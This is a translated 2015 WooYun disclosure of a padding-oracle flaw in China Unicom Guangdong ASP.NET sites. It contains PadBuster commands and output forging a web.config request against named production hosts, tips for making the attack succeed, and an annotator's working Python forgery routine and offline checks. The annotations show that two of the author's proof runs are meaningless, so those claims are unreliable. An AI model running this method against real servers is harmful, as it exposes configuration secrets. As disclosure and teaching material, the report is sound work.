
Vulnerability summary (followers: 24)

Defect ID: wooyun-2015-0106017

Title: Padding Oracle Vulnerability information disclosure in a China Unicom monitoring platform, with exploitation walkthrough

Affected vendor: 中国联通 (China Unicom)

Author: 几何黑店

Submitted: 2015-04-08 14:09

Fixed: 2015-05-25 18:52

Published: 2015-05-25 18:52

Vulnerability type: sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: handed to a third-party partner (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-04-08: details sent to the vendor, awaiting vendor handling
2015-04-10: vendor confirmed; details visible to the vendor only
2015-04-20: details opened to core white hats and relevant domain experts
2015-04-30: details opened to regular white hats
2015-05-10: details opened to intern white hats
2015-05-25: details opened to the public

Summary:

Unicom's vulnerabilities just keep piling up.

Details:

http://lar.unicomgd.com/

[screenshot: QQ图片20150405145422.png]


The hole I reported last time:
http://wooyun.org/bugs/wooyun-2015-099087
Today, bored, I went back through the holes I had already posted to see whether any were still exploitable. Hey, there really was one.
ASPX. Seeing that made my eyes light up, and sure enough......
Let's look at the page source.

[screenshot: QQ图片20150405144358.png]


Bring out the tool:

[screenshot: QQ图片20150405145227.jpg]


padBuster.pl http://lar.unicomgd.com/WebResource.axd?d=rF9mcFBXRdOs0vsKIxd7PQ2 rF9mcFBXRdOs0vsKIxd7PQ2 16 -encoding 3 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 1 500 5923 N/A
2 ** 255 500 5925 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (146) [Byte 16]
[+] Success: (147) [Byte 15]
[+] Success: (240) [Byte 14]
[+] Success: (125) [Byte 13]
[+] Success: (246) [Byte 12]
[+] Success: (165) [Byte 11]
[+] Success: (108) [Byte 10]
[+] Success: (23) [Byte 9]
[+] Success: (21) [Byte 8]
[+] Success: (84) [Byte 7]
[+] Success: (56) [Byte 6]
[+] Success: (224) [Byte 5]
[+] Success: (241) [Byte 4]
[+] Success: (161) [Byte 3]
[+] Success: (40) [Byte 2]
[+] Success: (246) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): 9a5bd382c3443b7e3108cc9d1f9af692
[+] Intermediate Bytes (HEX): e627affcec335e1c1f6ba3f379f39193
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: mlvTgsNEO34xCMydH5r2kgAAAAAAAAAAAAAAAAAAAAA1
-------------------------------------------------------
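What PadBuster's encrypt mode is doing in the run above, shown end to end against a local stand-in for the handler. This is an added example, not code from the report or from PadBuster: a toy 16-byte Feistel block cipher (hypothetical, standing in for AES) runs in CBC mode behind a server that takes the first block as the IV and reveals only whether the PKCS#7 padding was valid, which is the one bit the two distinct 500 responses above leak. The attacker side recovers the block cipher's decryption of a chosen block byte by byte (the "Intermediate Bytes" PadBuster prints; note that each accepted guess above XOR its padding value is one of them, 146 ^ 1 = 0x93 and 147 ^ 2 = 0x91 being the last two bytes of e627...9193), XORs the wanted plaintext into the block in front of it, and starts from an all-zero last block, which is why the encrypted value ends in a long run of A characters. DEMO_KEY and the server code are constructed for the demo; the attacker functions never read the key.

```python
"""Padding-oracle forgery, the way PadBuster's encrypt mode does it, against a local CBC
service. Constructed demo: a toy Feistel cipher stands in for AES; the attacker never
reads DEMO_KEY."""
import hashlib

BLOCK = 16
ROUNDS = 4
DEMO_KEY = b"constructed demo key, never shown to the attacker"


def _xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(half: bytes, key: bytes, rnd: int) -> bytes:
    # Keyed round function; the Feistel structure below makes the result invertible.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in range(ROUNDS):
        left, right = right, _xor(left, _round(right, key, rnd))
    return left + right


def block_decrypt(key: bytes, block: bytes) -> bytes:
    left, right = block[:8], block[8:]
    for rnd in reversed(range(ROUNDS)):
        left, right = _xor(right, _round(left, key, rnd)), left
    return left + right


def pkcs7_pad(data: bytes) -> bytes:
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def cbc_decrypt(key: bytes, data: bytes) -> bytes:
    """Server side: IV is data[:16]. ValueError on bad padding is the oracle."""
    if len(data) < 2 * BLOCK or len(data) % BLOCK:
        raise ValueError("length")
    out, prev = b"", data[:BLOCK]
    for i in range(BLOCK, len(data), BLOCK):
        out += _xor(block_decrypt(key, data[i:i + BLOCK]), prev)
        prev = data[i:i + BLOCK]
    n = out[-1]
    if not 1 <= n <= BLOCK or out[-n:] != bytes([n]) * n:
        raise ValueError("padding")
    return out[:-n]


def make_oracle(key: bytes):
    """oracle(data) -> True when padding is accepted (the 'not the error' response signature)."""
    calls = [0]

    def oracle(data: bytes) -> bool:
        calls[0] += 1
        try:
            cbc_decrypt(key, data)
            return True
        except ValueError:
            return False

    return oracle, calls


def recover_intermediate(oracle, target: bytes) -> bytes:
    """Learn D_k(target), PadBuster's 'Intermediate Bytes', last byte first."""
    inter, probe = bytearray(BLOCK), bytearray(BLOCK)
    for pos in range(BLOCK - 1, -1, -1):
        pad = BLOCK - pos
        for k in range(pos + 1, BLOCK):
            probe[k] = inter[k] ^ pad  # already-known bytes forced to the pad value
        for guess in range(255, -1, -1):  # PadBuster's search order, 255 down to 0
            probe[pos] = guess
            if not oracle(bytes(probe) + target):
                continue
            if pos == BLOCK - 1:
                # Edge case: a 0x02 0x02 (or longer) padding also validates. Disturb the
                # byte before it and re-query; only a genuine 0x01 padding survives.
                probe[pos - 1] ^= 0xFF
                survived = oracle(bytes(probe) + target)
                probe[pos - 1] ^= 0xFF
                if not survived:
                    continue
            inter[pos] = guess ^ pad
            break
        else:
            raise RuntimeError("byte %d: no guess accepted, responses do not form an oracle" % (pos + 1))
    return bytes(inter)


def forge_ciphertext(oracle, plaintext: bytes) -> bytes:
    """Return IV || C1 || ... || Cn that decrypts to plaintext. Like PadBuster, start from an
    all-zero last block (the trailing run of 'A' in its output) and work towards the front."""
    padded = pkcs7_pad(plaintext)
    out = bytes(BLOCK)
    for start in range(len(padded) - BLOCK, -1, -BLOCK):
        inter = recover_intermediate(oracle, out[:BLOCK])
        out = _xor(inter, padded[start:start + BLOCK]) + out
    return out
```

Calling `forge_ciphertext(make_oracle(DEMO_KEY)[0], b"|||~/web.config")` returns 32 bytes: a forged first block followed by the zero block, and `cbc_decrypt(DEMO_KEY, ...)` of them yields the chosen plaintext although no key was ever recovered. The call counter shows the cost PadBuster pays, at most 256 requests per byte per block. The re-query at the last byte is the one edge case worth knowing: a guess that happens to produce a valid 0x02 0x02 padding is also "accepted", and only disturbing the preceding byte tells it apart from a genuine 0x01.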


The first forged value is out; the final one is not far off. (The author calls these values "keys", but nothing is decrypted and no key is recovered. PadBuster's encrypt mode uses the padding oracle to learn what the server's block cipher decrypts a chosen block to, the "Intermediate Bytes" above, then XORs the wanted plaintext into the block in front of it. It starts from an all-zero last block, which is the trailing run of A characters in the encrypted value; the final digit is the .NET UrlToken pad count.)
Second-step value:

http://lar.unicomgd.com/ScriptResource.axd?d=-_O5kfEIAgFdMPGupyOWH5pb04LDRDt-MQjMnR-a9pIAAAAAAAAAAAAAAAAAAAAA0


Many people say they run into this vulnerability a lot but cannot get it to run. In my experience, the shorter the string after WebResource.axd?d= the more likely it is to run through; if it is very long, the odds of getting the first-step key out are low.
Sometimes, when the string is long, you can change the 3 in `16 -encoding 3 -plaintext "|||~/web.config"` to something else, for example:

-encoding [0-4]: Encoding Format of Sample (Default 0)
0=Base64, 1=Lower HEX, 2=Upper HEX
3=.NET UrlToken, 4=WebSafe Base64


When this error appears:

[screenshot: QQ图片20150405150740.png]


we can change the 16 in `16 -encoding 3 -plaintext "|||~/web.config"` to the number shown in the screenshot. One caveat before doing that: this error means the decoded sample is not a whole number of blocks, and PadBuster's own message says to double-check the encoding and the block size. The number it prints is the sample's length under the chosen encoding, not a block size. AES blocks are 16 bytes and 3DES blocks 8, so a run with the block size set to the sample's length treats the whole token as one "block" and its results mean nothing. The 66- and 64-byte runs in the proof section below show the symptom: every byte "succeeds" on the very first guess (255), and the intermediate bytes come out as the sequence bf c0 c1 ... fe, which is simply 0xFF XOR the padding value at each position.

Proof of vulnerability:

Two more:
http://a.unicomgd.com/
http://b.unicomgd.com/

padBuster.pl http://b.unicomgd.com/WebResource.axd?d=0Z76PrPlS9S1mTbXUM_zq1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL41uw41 0Z76PrPlS9S1mTbXUM_zq1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL41uw41 66 -encoding 0 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 8 500 8827 N/A
2 ** 248 500 8825 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------


padBuster.pl http://a.unicomgd.com/WebResource.axd?d=yu_vV8xwAIAwLO27Y1AKpzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7YA1k1 yu_vV8xwAIAwLO27Y1AKpzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7YA1k1 64 -encoding 0 -plaintext "|||~/web.config"
+-------------------------------------------+
| PadBuster - v0.3 |
| Brian Holyfield - Gotham Digital Science |
| labs@gdssecurity.com |
+-------------------------------------------+
INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 20794
INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 1
INFO: No error string was provided...starting response analysis
*** Response Analysis Complete ***
The following response signatures were returned:
-------------------------------------------------------
ID# Freq Status Length Location
-------------------------------------------------------
1 8 500 8827 N/A
2 ** 248 500 8825 N/A
-------------------------------------------------------
Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2
Continuing test with selection 2
[+] Success: (255) [Byte 64]
[+] Success: (255) [Byte 63]
[+] Success: (255) [Byte 62]
[+] Success: (255) [Byte 61]
[+] Success: (255) [Byte 60]
[+] Success: (255) [Byte 59]
[+] Success: (255) [Byte 58]
[+] Success: (255) [Byte 57]
[+] Success: (255) [Byte 56]
[+] Success: (255) [Byte 55]
[+] Success: (255) [Byte 54]
[+] Success: (255) [Byte 53]
[+] Success: (255) [Byte 52]
[+] Success: (255) [Byte 51]
[+] Success: (255) [Byte 50]
[+] Success: (255) [Byte 49]
[+] Success: (255) [Byte 48]
[+] Success: (255) [Byte 47]
[+] Success: (255) [Byte 46]
[+] Success: (255) [Byte 45]
[+] Success: (255) [Byte 44]
[+] Success: (255) [Byte 43]
[+] Success: (255) [Byte 42]
[+] Success: (255) [Byte 41]
[+] Success: (255) [Byte 40]
[+] Success: (255) [Byte 39]
[+] Success: (255) [Byte 38]
[+] Success: (255) [Byte 37]
[+] Success: (255) [Byte 36]
[+] Success: (255) [Byte 35]
[+] Success: (255) [Byte 34]
[+] Success: (255) [Byte 33]
[+] Success: (255) [Byte 32]
[+] Success: (255) [Byte 31]
[+] Success: (255) [Byte 30]
[+] Success: (255) [Byte 29]
[+] Success: (255) [Byte 28]
[+] Success: (255) [Byte 27]
[+] Success: (255) [Byte 26]
[+] Success: (255) [Byte 25]
[+] Success: (255) [Byte 24]
[+] Success: (255) [Byte 23]
[+] Success: (255) [Byte 22]
[+] Success: (255) [Byte 21]
[+] Success: (255) [Byte 20]
[+] Success: (255) [Byte 19]
[+] Success: (255) [Byte 18]
[+] Success: (255) [Byte 17]
[+] Success: (255) [Byte 16]
[+] Success: (255) [Byte 15]
[+] Success: (255) [Byte 14]
[+] Success: (255) [Byte 13]
[+] Success: (255) [Byte 12]
[+] Success: (255) [Byte 11]
[+] Success: (255) [Byte 10]
[+] Success: (255) [Byte 9]
[+] Success: (255) [Byte 8]
[+] Success: (255) [Byte 7]
[+] Success: (255) [Byte 6]
[+] Success: (255) [Byte 5]
[+] Success: (255) [Byte 4]
[+] Success: (255) [Byte 3]
[+] Success: (255) [Byte 2]
[+] Success: (255) [Byte 1]
Block 1 Results:
[+] New Cipher Text (HEX): c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e8ebeaedecefeed1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf
[+] Intermediate Bytes (HEX): bfc0c1c2c3c4c5c6c7c8c9cacbcccdcecfd0d1d2d3d4d5d6d7d8d9dadbdcdddedfe0e1e2e3e4e5e6e7e8e9eaebecedeeeff0f1f2f3f4f5f6f7f8f9fafbfcfdfe
-------------------------------------------------------
** Finished ***
[+] Encrypted value is: w7y9vOyzoKTpq6akraWq%2F%2F7h4OPi5eTn5uno6%2Brt7O%2Fu0dDT0tXU19bZ2Nva3dzf3sHAw8LFxMfGycjLys3MzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%3D
-------------------------------------------------------


The final key was taking too long to run, so I did not run it.
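The tokens and numbers quoted in this report can be checked offline, and doing so explains both the "-encoding" and block-size tips given earlier and what the three proof runs actually show. The following is an added example, not part of the report or of PadBuster: it decodes the d= values as .NET UrlTokens (what -encoding 3 means), shows what a forgiving Base64 decoder (-encoding 0, which in PadBuster is Perl's MIME::Base64, skipping characters outside its alphabet) makes of the same strings, redoes the single XOR that turns intermediate bytes into a forged block, and checks for the "first guess accepted" pattern. All constants are copied from the page. One interpretation is mine, not the report's: 68 bytes is 48 + 20, which is consistent with three AES blocks followed by a SHA1 signature, the kind of signing the MS10-070 update added to encrypted ASP.NET data.

```python
"""Offline checks on the d= tokens and PadBuster output quoted in this report (constructed
example; constants copied from the page)."""
import base64

AES_BLOCK = 16
PLAINTEXT = b"|||~/web.config"

LAR_SAMPLE = "rF9mcFBXRdOs0vsKIxd7PQ2"                       # step-one sample, lar.unicomgd.com
LAR_STEP2 = "-_O5kfEIAgFdMPGupyOWH5pb04LDRDt-MQjMnR-a9pIAAAAAAAAAAAAAAAAAAAAA0"
B_SAMPLE = "0Z76PrPlS9S1mTbXUM_zq1EeJZK5v1hpHIarjgBsOKDz8UVvXS_FrmxDYqlAX3CedD0vtRtH3O5OAxQ-QwX8GL41uw41"
A_SAMPLE = "yu_vV8xwAIAwLO27Y1AKpzIXUt5GH41VdO_P9SEoF1Oi1m2S_pIUSIDbfqS2Hytam6SGX8Ccci--AT1U8BE0-t7YA1k1"
LAR_INTERMEDIATE = bytes.fromhex("e627affcec335e1c1f6ba3f379f39193")
LAR_FORGED = bytes.fromhex("9a5bd382c3443b7e3108cc9d1f9af692")
DEGENERATE_INTERMEDIATE = bytes(range(0xBF, 0xFF))       # bf c0 c1 ... fe, from the 64-byte runs
DEGENERATE_FORGED = bytes.fromhex(
    "c3bcbdbcecb3a0a4e9aba6a4ada5aafffee1e0e3e2e5e4e7e6e9e8ebeaedecefee"
    "d1d0d3d2d5d4d7d6d9d8dbdadddcdfdec1c0c3c2c5c4c7c6c9c8cbcacdcccf")


def urltoken_decode(token: str) -> bytes:
    """Inverse of .NET UrlTokenEncode (PadBuster -encoding 3): URL-safe Base64 with the '='
    padding removed and the count of removed '=' appended as a single digit."""
    if len(token) < 2 or token[-1] not in "012":
        raise ValueError("not a UrlToken: missing trailing pad digit")
    body, pad = token[:-1], int(token[-1])
    if (len(body) + pad) % 4:
        raise ValueError("not a UrlToken: %d chars + %d pad is not a multiple of 4" % (len(body), pad))
    return base64.urlsafe_b64decode(body + "=" * pad)


def urltoken_encode(data: bytes) -> str:
    b64 = base64.urlsafe_b64encode(data).decode("ascii")
    return b64.rstrip("=") + str(b64.count("="))


def lenient_base64_length(token: str) -> int:
    """Byte count a forgiving Base64 decoder yields when a UrlToken is fed to it as plain
    Base64 (-encoding 0): '-' and '_' are dropped, the trailing pad digit is kept as data."""
    kept = sum(1 for c in token if c.isalnum() or c in "+/")
    return kept * 6 // 8


def block_report(token: str, block: int = AES_BLOCK) -> dict:
    """Is the decoded sample a whole number of cipher blocks?"""
    n = len(urltoken_decode(token))
    return {"bytes": n, "whole_blocks": n // block, "extra_bytes": n % block}


def pkcs7_pad(data: bytes, block: int) -> bytes:
    n = block - len(data) % block
    return data + bytes([n]) * n


def forge_block(intermediate: bytes, plaintext: bytes) -> bytes:
    """All of 'encrypt mode' once the intermediate bytes are known: C_prev = D_k(C) XOR P."""
    padded = pkcs7_pad(plaintext, len(intermediate))
    return bytes(i ^ p for i, p in zip(intermediate, padded))


def first_guess_artifact(block: int) -> bytes:
    """Intermediate bytes PadBuster reports if guess 255 is 'accepted' at every position:
    0xFF XOR the padding value, a rising run ending in 0xFE. A real oracle does not produce
    this; it means the chosen response signature never separated good from bad padding."""
    return bytes(0xFF ^ (block - pos) for pos in range(block))


def step2_reuses_step1(step2_token: str, forged_block: bytes) -> bool:
    """True if the second-step value is <new block> || <step-one block> || <zero block>."""
    raw = urltoken_decode(step2_token)
    return len(raw) == 3 * AES_BLOCK and raw[AES_BLOCK:] == forged_block + bytes(AES_BLOCK)


if __name__ == "__main__":
    for name, tok in (("lar", LAR_SAMPLE), ("b", B_SAMPLE), ("a", A_SAMPLE)):
        print(name, block_report(tok), "as plain Base64:", lenient_base64_length(tok), "bytes")
    print("lar forged block matches:", forge_block(LAR_INTERMEDIATE, PLAINTEXT) == LAR_FORGED)
    print("step 2 carries step 1:", step2_reuses_step1(LAR_STEP2, LAR_FORGED))
    print("64-byte runs are the first-guess artifact:",
          first_guess_artifact(64) == DEGENERATE_INTERMEDIATE)
```

What the checks say about the three runs: the lar.unicomgd.com sample decodes to exactly 16 bytes, one AES block, and XORing the printed intermediate bytes with the padded plaintext reproduces the printed forged block, so that run is a genuine oracle. The second-step URL decodes to 48 bytes whose last two blocks are the step-one block followed by the zero block, so step two prepended one more block rather than starting over. The a. and b. samples decode to 68 bytes under the correct encoding, which is not a whole number of 16-byte (or 8-byte) blocks; forced through plain Base64 they come out as 64 and 66 bytes, which is where those two "block sizes" came from, and the intermediate bytes bf c0 ... fe those runs printed are exactly what PadBuster produces when it accepts guess 255 at every position. Those two runs therefore demonstrate nothing about a. and b.unicomgd.com.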

Fix:

You know what to do.

Copyright notice: when reposting, credit the source, 几何黑店@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-04-10 18:51

Vendor reply:

CNVD has notified the site's operating unit (the software vendor) through the contact details published on the site (or a previously established handling channel).

Latest status:

None


Vulnerability rating:

Comments

  1. 2015-05-25 21:02 | Mr.R (intern white hat | Rank: 52, vulns: 14 | looking for a master to carry me, qq2584110147)

    Damn... does this hole really work? The ones bugscan finds for me have never succeeded.

  2. 2015-05-26 14:54 | BMa (regular white hat | Rank: 1776, vulns: 200)

    The block size is either 8 or 16 bytes; why does changing it to 64 also work?

  3. 2015-05-26 23:19 | diguoji (regular white hat | Rank: 323, vulns: 79 | Changchun, Jilin, China)

    Did you try dumping the config file? If you did, I'd like to know whether it came out.

  4. 2015-05-27 00:08 | PyNerd (regular white hat | Rank: 156, vulns: 28 | Just for shell.)

    @几何黑店 what do you do when the URL gets a 301?

  5. 2015-05-27 01:54 | 几何黑店 (core white hat | Rank: 1527, vulns: 231 | I need to keep a lower profile.......)

    @PyNerd If it's a 301 I usually just give up.

  6. 2015-06-04 23:09 | 孔卡 (intern white hat | Rank: 42, vulns: 12 | I'm past the age where, with only one drumstick on the table, I'd be sure to...)

    @几何黑店 http://lar.unicomgd.com/ScriptResource.axd?d=-_O5kfEIAgFdMPGupyOWH5pb04LDRDt-MQjMnR-a9pIAAAA​AAAAAAAAAAAAAAAAA0 is the final web.config path, right? Why can't it be read, has it already been fixed? In "64 -encoding 0 -plaintext", isn't that 0 normally 3? What did you base the 0 on here?